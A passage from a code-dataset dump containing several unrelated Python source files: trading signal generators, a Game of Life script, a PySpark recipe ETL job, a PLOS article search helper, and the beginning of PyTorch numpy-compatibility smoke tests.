threshold=0.05):\n \"\"\"\n :param period: period of momentum\n :param smoothing: period of ema smoothing\n :param threshold: threshold for entries. Max abs indicator value is period we generate long entries\n when indicator crosses down lower threshold (period-T) and\n short whem it crosses up upper threshold (-(period-T))\n \"\"\"\n self.period = period\n self.smoothing = smoothing\n self.threshold = threshold\n if threshold > 1:\n raise ValueError(f'Threshold parameter {threshold} exceedes 1 !')\n\n def fit(self, x, y, **fit_args):\n return self\n\n def predict(self, x):\n price_col = self.market_info_.column\n c = x[price_col]\n\n pos = (c > c.shift(self.period)) + 0\n neg = (c < c.shift(self.period)) + 0\n osi = apply_to_frame(ema, pos.rolling(self.period).sum() - neg.rolling(self.period).sum(), self.smoothing)\n\n kt = self.period * (1 - self.threshold)\n return srows(\n pd.Series(+1, osi[(osi.shift(2) > -kt) & (osi.shift(1) > -kt) & (osi <= -kt)].index),\n pd.Series(-1, osi[(osi.shift(2) < +kt) & (osi.shift(1) < +kt) & (osi >= +kt)].index)\n )\n\n\n@signal_generator\nclass InternalBarStrength(BaseEstimator):\n \"\"\"\n Internal bar strength mean reverting generator.\n when:\n | close is > (high - T) -> -1\n | close is < (low + T) -> +1\n\n T in (0 ... 1/2)\n \"\"\"\n\n def __init__(self, timeframe, threshold, tz='UTC'):\n self.timeframe = timeframe\n self.threshold = threshold\n self.tz = tz\n self.exact_time = True\n if threshold >= 0.5 or threshold <= 0:\n raise ValueError(f'Threshold parameter {threshold} must be in (0 ... 0.5) range !')\n\n def fit(self, x, y, **fit_args):\n return self\n\n def predict(self, x):\n _check_frame_columns(x, 'open', 'close', 'high', 'low')\n\n xf = ohlc_resample(x, self.timeframe, resample_tz=self.tz)\n\n # on next bar openinig\n self.exact_time = True\n ibs = ((xf.close - xf.low) / (xf.high - xf.low)).shift(1)\n\n return srows(\n pd.Series(+1, ibs[ibs < self.threshold].index),\n pd.Series(-1, ibs[ibs > 1 - self.threshold].index)\n )\n\n\n@signal_generator\nclass Equilibrium(BaseEstimator):\n \"\"\"\n - Calculate a simple N-period moving average of the market price.\n - Subtract the current market price from its moving average.\n - Calculate a N-period exponential moving average on the subtracted values.\n\n The result is the N-period Equilibrium Indicator that we will use to generate mean-reverting signals.\n \"\"\"\n\n def __init__(self, period, threshold, smoother='sma'):\n self.period = period\n self.smoother = smoother\n self.threshold = threshold\n\n def fit(self, x, y, **kwargs):\n return self\n\n def predict(self, x):\n c = x[self.market_info_.column]\n k1 = smooth(c, self.smoother, self.period)\n dK = smooth(k1 - c, 'ema', self.period)\n\n return srows(\n pd.Series(-1, dK[\n ((dK.shift(2) < +self.threshold) & ((dK.shift(1) < +self.threshold) & (dK > +self.threshold)))\n ].index),\n\n pd.Series(+1, dK[\n ((dK.shift(2) > -self.threshold) & ((dK.shift(1) > -self.threshold) & (dK < -self.threshold)))\n ].index)\n )\n\n\n@signal_generator\nclass WalkForwardTest(BaseEstimator):\n \"\"\"\n Walk Forward Test\n \"\"\"\n\n def __init__(self, estimator: BaseEstimator, train_period=4, test_period=1, units='W'):\n \"\"\"\n Create new WFT using provided estimator and train/test windows\n By default it uses 4 weeks for training and 1 week for prediction\n \"\"\"\n if estimator is None or not isinstance(estimator, BaseEstimator):\n raise ValueError(f\"Estimator must be non empty and be derived from BaseEstimator\")\n\n if train_period <= 0 or test_period <= 0:\n raise ValueError(f\"Train and Test periods must be postive numbers: {train_period} / {test_period}\")\n\n self.estimator = estimator\n self.train_period = train_period\n self.test_period = test_period\n self.units = units\n self.sigs = None\n\n def fit(self, x: pd.DataFrame, y, **kwargs):\n self.sigs = pd.Series(dtype='float64')\n signals = []\n \n # - we may want to attach indicator as additional coliumn to avoid recalcuting it on every chank\n # because some indicators (SMA, RSI, ...) may have empty data in the begging \n # nans for first 'period' bars for SMA for example\n if hasattr(self.estimator, 'aux_data'):\n aux_d = self.estimator.aux_data(x, **kwargs)\n if aux_d is not None:\n if isinstance(aux_d, pd.DataFrame):\n if [c for c in x.columns if c in aux_d.columns]:\n raise ValueError(f\"Some aux dataframe column names '{aux_d.columns}' intersect with original dataframe columns !\")\n elif isinstance(aux_d, pd.Series):\n if aux_d.name in x.columns:\n raise ValueError(f\"Aux data series name '{aux_d.name}' intersects with original dataframes columns !\")\n else:\n raise ValueError(f\"Aux data has unrecognized type '{type(aux_d)}' !\")\n\n # attach aux data \n x = scols(x.copy(), aux_d)\n \n for trn, tst in rolling_forward_test_split(x, self.train_period, self.test_period, units='W'):\n self.estimator.fit(x.loc[trn], y, **kwargs)\n signals.append(self.estimator.predict(x.loc[tst]))\n self.sigs = srows(*signals)\n return self\n\n def predict(self, x):\n if hasattr(self.estimator, 'exact_time'):\n self.exact_time = self.estimator.exact_time\n return self.sigs\n\n def tracker(self, **kwargs):\n if hasattr(self.estimator, 'tracker'):\n return self.estimator.tracker(**kwargs)\n return None\n","repo_name":"dmarienko/Qube","sub_path":"qube/examples/learn/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":11942,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"8715849475","text":"#---------------------------------------------------------------------------\n\nfrom GameOfLife import * # imports all the functions inside GameOfLife.py\nfrom GameParameters import * # imports the parameters to be used here\n\n# thisGen[] & nextGen[] are Python lists that acts as 2D matrices that holds the data whether a cell is alive or dead.\n# thisGen[] holds the data for the current generation.\n# nextGen[] holds the data for the next generation as it purely depends on the previous condition i.e thisGen[] here.\n\nthisGen = []\nnextGen = []\n\n# initGrid() is a function included in library GameOfLife.py which gives \n# the list (which is passed), an initial state which is completely random.\n\ninitGrid(ROWS, COLS, thisGen)\n\n# printGen() is a function included in library GameOfLife.py which prints \n# the generation (2D matrix).\n\n# processNextGen() generates the next generation (next 2D matrix) which is \n# totaly dependent upon the previous generation (current generation 2D matrix),\n# and hence both (thisGen[] and nextGen[]) are arguments to this function.\n\n# sleep() is a function in the library \"time\" which takes arguments in seconds.\n# It produces delay between the previous generation and the next generation.\n\nnextGen = copy.deepcopy(thisGen)\n\nprintGen(ROWS, COLS, thisGen, 0)\n\nfor gens in range(GENERATIONS):\n processNextGen(ROWS, COLS, thisGen, nextGen)\n printGen(ROWS, COLS, nextGen, gens)\n input()\n\n# Once current generation is done printing. The next generation is now \n# proceessed the next generation to be printed out next.\n# At last thisGen has been assigned the value of nextGen for getting copied.\n\n thisGen = copy.deepcopy(nextGen)\n\ninput(\"Finished. Press to quit.\")\n","repo_name":"GreatDevelopers/ScriptCAD","sub_path":"Session0/CommentedCode/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"31536093259","text":"from Task_Base import Tasks as tasks\r\nfrom Get_URL_Data import get_recipe\r\nfrom pyspark.sql import SparkSession\r\nfrom pyspark.sql.functions import lower, expr, udf, split, current_date\r\nfrom pyspark.sql.types import StringType, IntegerType\r\nfrom datetime import datetime\r\nimport logging\r\nimport logging.handlers\r\n\r\nimport sys\r\nimport os\r\n\r\n# Required job parameters\r\nrecipe_file = sys.argv[1]\r\ntasks_arg = sys.argv[2]\r\nquery_table = sys.argv[3]\r\nargs_length = len(sys.argv)\r\n#recipe_file = 'C:\\\\Users\\\\Dell\\\\Downloads\\\\Recipes\\\\input'\r\n# args_length = 2\r\nif args_length < 2:\r\n print(\"Please provide at least 2 arguments as input file location and task to execute\")\r\n exit(1)\r\nelse:\r\n # tasks_arg = 'load,transform,query'\r\n tasks_piped = [i.strip().lower() for i in tasks_arg.split(',')]\r\n if 'query' in tasks_piped:\r\n # query_table = \"select * from recipe_table\"\r\n if len(query_table.strip()) == 0:\r\n print(\"Please Provide a valid Sql query for Recipe_table(name, recipe, date_of_execution, difficulty)\")\r\n exit(1)\r\n\r\nprefix = os.path.abspath(recipe_file)\r\nrecipe_parquet_folder = 'Recipe_parquet'\r\nrecipe_parquet_outfile = os.path.join(prefix, 'output', recipe_parquet_folder)\r\n\r\nstart_time = datetime.utcnow()\r\nspark = SparkSession \\\r\n .builder \\\r\n .appName(\"Recipe Data\") \\\r\n .config(\"hive.exec.dynamic.partition\", \"true\") \\\r\n .config(\"hive.exec.dynamic.partition.mode\", \"nonstrict\") \\\r\n .config(\"spark.sql.warehouse.dir\", recipe_parquet_outfile) \\\r\n .config(\"spark.sql.catalogImplementation\", \"hive\") \\\r\n .enableHiveSupport() \\\r\n .getOrCreate()\r\n\r\n# This is to fetch Recipe text info from input url\r\nget_recipe_udf = udf(get_recipe, StringType())\r\n\r\n\r\n# to get the total time in Minutes\r\ndef get_total_time(time_str):\r\n if 'H' in time_str and 'M' in time_str:\r\n return int(time_str.split('H')[0])*60 + int((time_str.split('H')[1]).split('M')[0])\r\n else:\r\n if 'M' in time_str:\r\n return int(time_str.split('M')[0])\r\n else:\r\n return int(time_str.split('H')[0])*60\r\n\r\n\r\n# converting it to udf\r\nget_total_time_udf = udf(get_total_time, IntegerType())\r\n\r\n\r\n# a executor to run some Tasks in a specific order\r\nclass Executor(tasks):\r\n def __init__(self, task=[]):\r\n self.task = task\r\n\r\n def run(self):\r\n for i in self.task:\r\n if i == 'load':\r\n print('load')\r\n self.load()\r\n else:\r\n if i == 'transform':\r\n print('transform')\r\n self.transform()\r\n else:\r\n if i == 'query':\r\n print('query')\r\n self.query_table()\r\n else:\r\n print(\"Not a Task\")\r\n\r\n def load(self):\r\n try:\r\n self.recipe_raw_df = spark.read.json(recipe_file)\r\n\r\n except Exception as e:\r\n print(\"Error - during load\")\r\n self.raise_email(str(e))\r\n raise e\r\n\r\n def transform(self):\r\n try:\r\n recipe_raw = self.recipe_raw_df.filter(lower(self.recipe_raw_df[\"ingredients\"]).contains(\"beef\")) \\\r\n .withColumn('cooktime', split(self.recipe_raw_df[\"cookTime\"], 'PT')[1]) \\\r\n .withColumn('preptime', split(self.recipe_raw_df[\"prepTime\"], 'PT')[1])\r\n\r\n recipe_raw = recipe_raw.select(\r\n recipe_raw[\"name\"],\r\n get_total_time_udf(recipe_raw[\"cooktime\"]).alias(\"cookTime\"),\r\n get_total_time_udf(recipe_raw[\"preptime\"]).alias(\"prepTime\"),\r\n get_recipe_udf(recipe_raw[\"url\"]).alias(\"recipe\"),\r\n current_date().alias(\"date_of_execution\")\r\n )\r\n recipe_raw.createOrReplaceTempView(\"recipe_flat_view\")\r\n # recipe_raw.show(20, False)\r\n sql = \"\"\"\r\n select \r\n name,\r\n recipe,\r\n date_of_execution,\r\n case when (cookTime + prepTime) > 60 then 'Hard'\r\n when (cookTime + prepTime) > 30 and (cookTime + prepTime) <= 60 then 'Medium'\r\n when (cookTime + prepTime) <= 30 then 'Easy'\r\n else 'Unknown'\r\n end as difficulty\r\n from recipe_flat_view\r\n \"\"\"\r\n recipe_raw = spark.sql(sql)\r\n recipe_raw.createOrReplaceTempView(\"recipe_flat_view\")\r\n #final_df.printSchema()\r\n spark.sql(\"CREATE DATABASE IF NOT EXISTS mydb\")\r\n spark.sql(\"use mydb\").collect()\r\n spark.sql(\"INSERT INTO Recipe_table PARTITION (difficulty)\\\r\n SELECT name,recipe,date_of_execution,difficulty FROM recipe_flat_view\")\r\n\r\n except Exception as e:\r\n print(\"Error - during transform\")\r\n self.raise_email(str(e))\r\n raise e\r\n\r\n def query_table(self):\r\n try:\r\n spark.sql(\"SHOW DATABASES\").show()\r\n spark.sql(\"use mydb\").collect()\r\n spark.sql(\"SHOW TABLES\").show()\r\n spark.sql(query_table).show(5, False)\r\n\r\n except Exception as e:\r\n print(\"Error - during save\")\r\n self.raise_email(str(e))\r\n raise e\r\n\r\n def raise_email(self, e):\r\n smtp_handler = logging.handlers.SMTPHandler(mailhost=(\"smtp.example.com\", 25),\r\n fromaddr=\"from@example.com\",\r\n toaddrs=\"to@example.com\",\r\n subject=u\"AppName error!\")\r\n\r\n logger = logging.getLogger()\r\n logger.addHandler(smtp_handler)\r\n logger.exception(e)\r\n\r\n\r\ndef create_table():\r\n #recipe_parquet_outfile = 'file:/C:/Users/Dell/Downloads/Recipes/output/Recipe_parquet'\r\n try:\r\n spark.sql(\"CREATE DATABASE IF NOT EXISTS mydb\")\r\n spark.sql(\"SHOW DATABASES\").show()\r\n spark.sql(\"use mydb\").collect()\r\n spark.sql(\"SHOW TABLES\").show()\r\n sql_str = \"CREATE TABLE IF NOT EXISTS Recipe_table \" \\\r\n \"(name STRING, recipe STRING, date_of_execution DATE, difficulty STRING)\" \\\r\n \" USING parquet OPTIONS \" \\\r\n \"(mode 'append',\" \\\r\n \"serialization.format '1',\" \\\r\n \"path \" + \"'\"+recipe_parquet_outfile+\"'\" + \")\" \\\r\n \" PARTITIONED BY (difficulty)\"\r\n spark.sql(sql_str)\r\n spark.sql(\"SHOW TABLES\").show()\r\n\r\n except Exception as e:\r\n print(\"Error - outer main\")\r\n executor.raise_email(str(e))\r\n raise e\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n print(\"log - Job Started. %s\" % (datetime.now().strftime('%m/%d/%Y %H:%M:%S')))\r\n # Task to be run in order\r\n print(tasks_piped)\r\n executor = Executor(tasks_piped)\r\n\r\n try:\r\n create_table()\r\n executor.run()\r\n\r\n except Exception as e:\r\n print(\"Error - outer main\")\r\n executor.raise_email(str(e))\r\n raise e\r\n\r\n end_time = datetime.utcnow()\r\n duration = (end_time - start_time).total_seconds()\r\n print(\"Log - Job Completed. %s seconds\" % duration)\r\n","repo_name":"KumarRoshandot/Food-Recipe-Apache-Spark-Python","sub_path":"Recipie_Process.py","file_name":"Recipie_Process.py","file_ext":"py","file_size_in_byte":7225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"24699315601","text":"import json\nfrom urllib.request import urlopen\nfrom urllib.parse import quote\nfrom datetime import datetime, timedelta\nimport requests\nfrom bs4 import BeautifulSoup\n\nsearchUrl = 'http://api.plos.org/search?'\njournalUrls = {'PLoS Biology' : 'http://www.plosbiology.org',\n 'PLoS Genetics' : 'http://www.plosgenetics.org',\n 'PLoS Computational Biology' : 'http://www.ploscompbiol.org',\n 'PLoS Medicine' : 'http://www.plosmedicine.org',\n 'PLoS ONE' : 'http://www.plosone.org',\n 'PLoS Neglected Tropical Diseases' : 'http://www.plosntds.org',\n 'PLoS Pathogens' : 'http://www.plospathogens.org'}\napi_key = '&api_key={UnppqeqPjpZEH7nEqkRd}'\n\ndef titleSearch(title=\"Ten Simple Rules\"):\n '''\n args: title - string note: use double quotes\n '''\n return searchUrl + 'q=title:' + title + api_key\n\ndef formatArticleUrl(doi,journal):\n '''\n Format a link to the article page, given it's doi and journal\n '''\n return journalUrls.get(journal) + '/article/info%3Adoi%2F' + doi.replace('/','%2F')\n\n\ndef search(query='*:*'):\n '''\n Basic Solr search functionality.\n This takes in a string or dictionary. If a string is passed, it is assumed to be basic search terms; \n and if a dictionary is passed, the arguments are passed to solr.\n\n Returns a list containing dictionary objects for each article found. \n '''\n\n if isinstance(query,str): \n query = { 'q' : query }\n else:\n if 'q' not in query: query['q'] = '*:*' #make sure we include a 'q' parameter\n query['wt'] = 'json' #make sure the return type is json\n query['fq'] = quote('doc_type:full AND !article_type_facet:\"Issue Image\"') #search only for articles\n query['api_key'] = 'UnppqeqPjpZEH7nEqkRd' # You need to substitute this key value for your own PLoS API key. If you do not have a PLoS API Key, please register for a key at http://api.plos.org/registration/\n \n url = searchUrl;\n\n for part in query:\n url += '%s%s=%s' % ('&' if url is not searchUrl else '',part,query[part])\n print('Making request to',url) #TEST\n r = requests.get(url)\n soup=BeautifulSoup(r.text)\n docs = soup.findAll('doc') \n # generate dictionary { docs ('title' : ,'doi': , 'journal': , 'authors': }}\n mydict = {}\n for i in range(0,len(docs)):\n if docs[i].find('arr',{'name':'author_display'}) == None: continue\n else: \n mydict.setdefault(i,{})\n mydict[i] = {'title':docs[i].find('str',{'name':'title_display'})[i].string,\n 'doi': docs[i].find('str', {'name' : 'id'}).string,\n 'journal': docs[i].find('str',{'name' :'journal'}).string,\n 'date': docs[i].find('date').string,\n 'second_auth': docs[i].find('arr',{'name':'author_display'}).str.string\n }\n \n \n return mydict\n\ndef authorSearch(author='Michael B Eisen', strict=True, limit=10):\n '''\n Search for articles by the given author.\n\n author - the name of the author\n strict - whether or not the search should be strict, e.g. if we search for \"Michael Eisen\" without a strict search,\n we'll find articles with authors named Michael, or Eisen. With a strict search, we look for exactly the text \"Michael Eisen\"\n limit - the number of articles to display\t\n '''\n query = {}\n name = quote(author)\n if strict : name = '\"' + name + '\"' \n query['q'] = 'author:' + name\n query['fl'] = 'id,journal,title' #specify the fields we need returned\n query['rows'] = limit\n results = search(query)\n print('Articles by %s:' %(author))\n print('*'*10)\n i=0\n for doc in results:\n print('(%s) %s (%s)' % (i+1,results[doc]['title'],formatArticleUrl(results[doc]['doi'],results[doc]['journal'])))\n\ndef authorViews(author='Michael B Eisen'):\n '''\n Find the total number of views of articles by the given author.\n author - the name of the author to look up\n '''\n results = search({'q' : 'author:\"' + quote(author) + '\"',\n 'rows' : 999999, #SOLR limits to 10 results by default \n 'fl' : 'counter_total_all' #SOLR field containing all time views\n })\n views = 0\n for doc in results:\n views += doc.get('counter_total_all')\n print('%s has %s all time views on PLoS!' % (author,views))\n\ndef graphPubs(start,end,out='publications.csv',query=None):\n '''\n Generate a csv file with the number of publications on each day in the specified range. \n\n start - the start date (inclusive)\n end - the end date (exclusive)\t\n (Dates should be passed in YYYY-MM-DD format.)\n out - name of file to which results should be written.\n query - addition query parameters, e.g. query='journal:\"PLoS ONE\"' would graph PLoS ONE publications\n\n Note that to specify an specific date to SOLR, you must double-quote it; e.g. q=publication_date:\"2009-10-19T20:10:00Z/DAY\".\n To specify a range, surround it with square brackets, e.g. q=[* TO NOW]. \n See http://wiki.apache.org/solr/SolrQuerySyntax#Specifying_a_Query_Parser\n and http://lucene.apache.org/solr/api/org/apache/solr/util/DateMathParser.html\n '''\n if isinstance(out,str): out = open(out,'w')\n \n for day in listDays(start,end):\n q = 'publication_date:\"%s/DAY\"%s' % (day, quote(' AND ' + query if query else ''))\n pubs=len(search({'q' : q, 'rows' : 99999}))\n out.write('%s,%s\\n' % (day.partition('T')[0],pubs))\t\n out.close()\n\ndef pubsOn(day,journal=None):\n '''\n List the articles published on the given day.\n\n day - the day to list publications for, in YYYY-mm-dd format.\n journal - optional journal name to which publications will be restricted.\n '''\n dayFormatted = datetime.strptime(day,'%Y-%m-%d').strftime('%Y-%m-%dT%H:%M:%SZ')\n q = 'publication_date:\"%s/DAY\"%s' %(dayFormatted,quote(' AND journal:\"' + journal + '\"') if journal else '')\n results = search({ 'q' : q, 'fl' : 'title,journal,id', 'rows' : 9999 })\n if len(results) > 0:\n print('Articles published %son %s:' % ('in ' + journal + ' ' if journal else '',day))\n print('*'*10)\n for article in results:\n print('%s) %s (%s)' % (results.index(article) + 1,article.get('title'),formatArticleUrl(article.get('id'),article.get('journal'))))\n else:\n print('No articles were published %son %s:' % ('in ' + journal + ' ' if journal else '',day))\n\ndef listDays(start,end):\n '''\n Helper method to return formatted strings for all the days in the range.\n '''\n start=datetime.strptime(start,'%Y-%m-%d')\n end=datetime.strptime(end,'%Y-%m-%d')\n delta = end - start\n days = []\n for day in range(0,delta.days):\n days.append((start + timedelta(days=day)).strftime('%Y-%m-%dT%H:%M:%SZ'))\n return days","repo_name":"mlg3672/PLOS","sub_path":"PLOSget.py","file_name":"PLOSget.py","file_ext":"py","file_size_in_byte":6896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14824234229","text":"# Owner(s): [\"module: dynamo\"]\n\nimport functools\nimport inspect\nfrom unittest import expectedFailure as xfail, skipIf as skip\n\nimport numpy as _np\nimport torch\n\nimport torch._numpy as w\nimport torch._numpy._ufuncs as _ufuncs\nimport torch._numpy._util as _util\nfrom pytest import raises as assert_raises\nfrom torch._numpy.testing import assert_allclose, assert_equal\n\nfrom torch.testing._internal.common_cuda import TEST_CUDA\nfrom torch.testing._internal.common_utils import (\n instantiate_parametrized_tests,\n parametrize,\n run_tests,\n subtest,\n TEST_WITH_TORCHDYNAMO,\n TestCase,\n)\n\n\n# These function receive one array_like arg and return one array_like result\none_arg_funcs = [\n w.asarray,\n w.empty_like,\n w.ones_like,\n w.zeros_like,\n functools.partial(w.full_like, fill_value=42),\n w.corrcoef,\n w.squeeze,\n w.argmax,\n # w.bincount, # XXX: input dtypes\n w.prod,\n w.sum,\n w.real,\n w.imag,\n w.angle,\n w.real_if_close,\n w.isreal,\n w.iscomplex,\n w.isneginf,\n w.isposinf,\n w.i0,\n w.copy,\n w.array,\n w.round,\n w.around,\n w.flip,\n w.vstack,\n w.hstack,\n w.dstack,\n w.column_stack,\n w.row_stack,\n w.flatnonzero,\n]\n\nufunc_names = _ufuncs._unary\nufunc_names.remove(\"invert\") # torch: bitwise_not_cpu not implemented for 'Float'\nufunc_names.remove(\"bitwise_not\")\n\none_arg_funcs += [getattr(_ufuncs, name) for name in ufunc_names]\n\n\n@instantiate_parametrized_tests\nclass TestOneArr(TestCase):\n \"\"\"Base for smoke tests of one-arg functions: (array_like) -> (array_like)\n\n Accepts array_likes, torch.Tensors, w.ndarays; returns an ndarray\n \"\"\"\n\n @parametrize(\"func\", one_arg_funcs)\n def test_asarray_tensor(self, func):\n t = torch.Tensor([[1.0, 2, 3], [4, 5, 6]])\n ta = func(t)\n\n assert isinstance(ta, w.ndarray)\n\n @parametrize(\"func\", one_arg_funcs)\n def test_asarray_list(self, func):\n lst = [[1.0, 2, 3], [4, 5, 6]]\n la = func(lst)\n\n assert isinstance(la, w.ndarray)\n\n @parametrize(\"func\", one_arg_funcs)\n def test_asarray_array(self, func):\n a = w.asarray([[1.0, 2, 3], [4, 5, 6]])\n la = func(a)\n\n assert isinstance(la, w.ndarray)\n\n\none_arg_axis_funcs = [\n w.argmax,\n w.argmin,\n w.prod,\n w.sum,\n w.all,\n w.any,\n w.mean,\n w.argsort,\n w.std,\n w.var,\n w.flip,\n]\n\n\n@instantiate_parametrized_tests\nclass TestOneArrAndAxis(TestCase):\n @parametrize(\"func\", one_arg_axis_funcs)\n @parametrize(\"axis\", [0, 1, -1, None])\n def test_andaxis_tensor(self, func, axis):\n t = torch.Tensor([[1.0, 2, 3], [4, 5, 6]])\n ta = func(t, axis=axis)\n assert isinstance(ta, w.ndarray)\n\n @parametrize(\"func\", one_arg_axis_funcs)\n @parametrize(\"axis\", [0, 1, -1, None])\n def test_andaxis_list(self, func, axis):\n t = [[1.0, 2, 3], [4, 5, 6]]\n ta = func(t, axis=axis)\n assert isinstance(ta, w.ndarray)\n\n @parametrize(\"func\", one_arg_axis_funcs)\n @parametrize(\"axis\", [0, 1, -1, None])\n def test_andaxis_array(self, func, axis):\n t = w.asarray([[1.0, 2, 3], [4, 5, 6]])\n ta = func(t, axis=axis)\n assert isinstance(ta, w.ndarray)\n\n\n@instantiate_parametrized_tests\nclass TestOneArrAndAxesTuple(TestCase):\n @parametrize(\"func\", [w.transpose])\n @parametrize(\"axes\", [(0, 2, 1), (1, 2, 0), None])\n def test_andtuple_tensor(self, func, axes):\n t = torch.ones((1, 2, 3))\n ta = func(t, axes=axes)\n assert isinstance(ta, w.ndarray)\n\n # a np.transpose -specific test\n if axes is None:\n newshape = (3, 2, 1)\n else:\n newshape = tuple(t.shape[axes[i]] for i in range(w.ndim(t)))\n assert ta.shape == newshape\n\n @parametrize(\"func\", [w.transpose])\n @parametrize(\"axes\", [(0, 2, 1), (1, 2, 0), None])\n def test_andtuple_list(self, func, axes):\n t = [[[1.0, 1.0, 1.0], [1.0, 1.0, 1.0]]] # shape = (1, 2, 3)\n ta = func(t, axes=axes)\n assert isinstance(ta, w.ndarray)\n\n @parametrize(\"func\", [w.transpose])\n @parametrize(\"axes\", [(0, 2, 1), (1, 2, 0), None])\n def test_andtuple_array(self, func, axes):\n t = w.asarray([[[1.0, 1.0, 1.0], [1.0, 1.0, 1.0]]])\n ta = func(t, axes=axes)\n assert isinstance(ta, w.ndarray)\n\n if axes is None:\n newshape = (3, 2, 1)\n else:\n newshape = tuple(t.shape[axes[i]] for i in range(t.ndim))\n assert ta.shape == newshape\n\n\narr_shape_funcs = [\n w.reshape,\n w.empty_like,\n w.ones_like,\n functools.partial(w.full_like, fill_value=42),\n w.broadcast_to,\n]\n\n\n@instantiate_parametrized_tests\nclass TestOneArrAndShape(TestCase):\n \"\"\"Smoke test of functions (array_like, shape_like) -> array_like\"\"\"\n\n def setUp(self):\n self.shape = (2, 3)\n self.shape_arg_name = {\n w.reshape: \"newshape\",\n } # reshape expects `newshape`\n\n @parametrize(\"func\", arr_shape_funcs)\n def test_andshape_tensor(self, func):\n t = torch.Tensor([[1, 2, 3], [4, 5, 6]])\n\n shape_dict = {self.shape_arg_name.get(func, \"shape\"): self.shape}\n ta = func(t, **shape_dict)\n assert isinstance(ta, w.ndarray)\n assert ta.shape == self.shape\n\n @parametrize(\"func\", arr_shape_funcs)\n def test_andshape_list(self, func):\n t = [[1, 2, 3], [4, 5, 6]]\n\n shape_dict = {self.shape_arg_name.get(func, \"shape\"): self.shape}\n ta = func(t, **shape_dict)\n assert isinstance(ta, w.ndarray)\n assert ta.shape == self.shape\n\n @parametrize(\"func\", arr_shape_funcs)\n def test_andshape_array(self, func):\n t = w.asarray([[1, 2, 3], [4, 5, 6]])\n\n shape_dict = {self.shape_arg_name.get(func, \"shape\"): self.shape}\n ta = func(t, **shape_dict)\n assert isinstance(ta, w.ndarray)\n assert ta.shape == self.shape\n\n\none_arg_scalar_funcs = [(w.size, _np.size), (w.shape, _np.shape), (w.ndim, _np.ndim)]\none_arg_scalar_funcs_xfail = [\n (w.size, _np.size),\n subtest(\n (w.shape, _np.shape), decorators=[xfail] if TEST_WITH_TORCHDYNAMO else []\n ), # XXX fails under dynamo\n (w.ndim, _np.ndim),\n]\n\n\n@instantiate_parametrized_tests\nclass TestOneArrToScalar(TestCase):\n \"\"\"Smoke test of functions (array_like) -> scalar or python object.\"\"\"\n\n @parametrize(\"func, np_func\", one_arg_scalar_funcs)\n def test_toscalar_tensor(self, func, np_func):\n t = torch.Tensor([[1, 2, 3], [4, 5, 6]])\n ta = func(t)\n tn = np_func(_np.asarray(t))\n\n assert not isinstance(ta, w.ndarray)\n assert ta == tn\n\n @parametrize(\"func, np_func\", one_arg_scalar_funcs_xfail)\n def test_toscalar_list(self, func, np_func):\n t = [[1, 2, 3], [4, 5, 6]]\n ta = func(t)\n tn = np_func(t)\n\n assert not isinstance(ta, w.ndarray)\n assert ta == tn\n\n @parametrize(\"func, np_func\", one_arg_scalar_funcs)\n def test_toscalar_array(self, func, np_func):\n t = w.asarray([[1, 2, 3], [4, 5, 6]])\n ta = func(t)\n tn = np_func(t)\n\n assert not isinstance(ta, w.ndarray)\n assert ta == tn\n\n\nshape_funcs = [w.zeros, w.empty, w.ones, functools.partial(w.full, fill_value=42)]\n\n\n@instantiate_parametrized_tests\nclass TestShapeLikeToArray(TestCase):\n \"\"\"Smoke test (shape_like) -> array.\"\"\"\n\n shape = (3, 4)\n\n @parametrize(\"func\", shape_funcs)\n def test_shape(self, func):\n a = func(self.shape)\n\n assert isinstance(a, w.ndarray)\n assert a.shape == self.shape\n\n\nseq_funcs = [w.atleast_1d, w.atleast_2d, w.atleast_3d, w.broadcast_arrays]\n\n\n@instantiate_parametrized_tests\nclass TestSequenceOfArrays(TestCase):\n \"\"\"Smoke test (sequence of arrays) -> (sequence of arrays).\"\"\"\n\n @parametrize(\"func\", seq_funcs)\n def test_single_tensor(self, func):\n t = torch.Tensor([[1, 2, 3], [4, 5, 6]])\n ta = func(t)\n\n # for a single argument, broadcast_arrays returns a tuple, while\n # atleast_?d return an array\n unpack = {w.broadcast_arrays: True}.get(func, False)\n res = ta[0] if unpack else ta\n\n assert isinstance(res, w.ndarray)\n\n @parametrize(\"func\", seq_funcs)\n def test_single_list(self, func):\n lst = [[1, 2, 3], [4, 5, 6]]\n la = func(lst)\n\n unpack = {w.broadcast_arrays: True}.get(func, False)\n res = la[0] if unpack else la\n\n assert isinstance(res, w.ndarray)\n\n @parametrize(\"func\", seq_funcs)\n def test_single_array(self, func):\n a = w.asarray([[1, 2, 3], [4, 5, 6]])\n la = func(a)\n\n unpack = {w.broadcast_arrays: True}.get(func, False)\n res = la[0] if unpack else la\n\n assert isinstance(res, w.ndarray)\n\n @parametrize(\"func\", seq_funcs)\n def test_several(self, func):\n arys = (\n torch.Tensor([[1, 2, 3], [4, 5, 6]]),\n w.asarray([[1, 2, 3], [4, 5, 6]]),\n [[1, 2, 3], [4, 5, 6]],\n )\n\n result = func(*arys)\n assert isinstance(result, (tuple, list))\n assert len(result) == len(arys)\n assert all(isinstance(_, w.ndarray) for _ in result)\n\n\nseq_to_single_funcs = [\n w.concatenate,\n w.stack,\n w.vstack,\n w.hstack,\n w.dstack,\n w.column_stack,\n w.row_stack,\n]\n\n\n@instantiate_parametrized_tests\nclass TestSequenceOfArraysToSingle(TestCase):\n \"\"\"Smoke test (sequence of arrays) -> (array).\"\"\"\n\n @parametrize(\"func\", seq_to_single_funcs)\n def test_several(self, func):\n arys = (\n torch.Tensor([[1, 2, 3], [4, 5, 6]]),\n w.asarray([[1, 2, 3], [4, 5, 6]]),\n [[1, 2, 3], [4, 5, 6]],\n )\n\n result = func(arys)\n assert isinstance(result, w.ndarray)\n\n\nsingle_to_seq_funcs = (\n w.nonzero,\n # https://github.com/Quansight-Labs/numpy_pytorch_interop/pull/121#discussion_r1172824545\n # w.tril_indices_from,\n # w.triu_indices_from,\n w.where,\n)\n\n\n@instantiate_parametrized_tests\nclass TestArrayToSequence(TestCase):\n \"\"\"Smoke test array -> (tuple of 